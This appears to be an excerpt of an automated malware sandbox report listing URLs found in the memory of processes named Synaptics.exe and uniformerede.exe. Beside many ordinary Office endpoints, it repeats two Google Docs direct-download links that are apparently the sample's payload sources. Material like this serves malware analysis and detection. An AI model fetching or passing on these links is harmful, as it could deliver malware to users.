                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://apis.live.net/v5.0/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://augloop.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://augloop.office.com/v2
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://autodiscover-s.outlook.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cdn.entity.
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://clients.config.office.net/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://config.edge.skype.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cortana.ai
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cortana.ai/api
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://cr.office.com
                                Source: Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000003.344709238.00000000054EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dataservice.o365filtering.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dataservice.o365filtering.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dev.cortana.ai
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://devnull.onenote.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://directory.services.
                                Source: Synaptics.exe, 00000009.00000000.370263622.0000000005DCD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.goog
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/0
                                Source: Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/dr
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                                Source: RCXDA77.tmp.9.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                                Source: Synaptics.exe, 00000009.00000000.361451571.000000000868E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357737287.000000000757E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.359584810.0000000009BDE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.411248230.0000000008E1E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.352590518.0000000004F2D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.362549509.0000000009A9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371349676.00000000091DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.352795877.000000000530D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.351426688.000000000476D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.411631790.000000000945E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371160417.0000000008F5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.360559351.000000000743E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.410996975.000000000891E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.354553381.0000000005F0E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.384503032.00000000096DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358342707.000000000818E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371594629.000000000959E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.373669676.00000000076BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408212313.000000000506D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.385722874.000000000A49E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408502135.000000000568D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&expo
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo$
                                Source: RCXDA77.tmp.9.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                                Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-a
                                Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                                Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0Y6
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                                Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                                Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                                Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                                Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?Y#
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                                Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCZ
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI#N
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJx
                                Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                                Source: Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                                Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNZ
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNw
                                Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU#Z
                                Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVx
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ=
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZw
                                Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadana
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadblY
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbw
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddn
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeport
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadev
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                                Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                                Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoZ
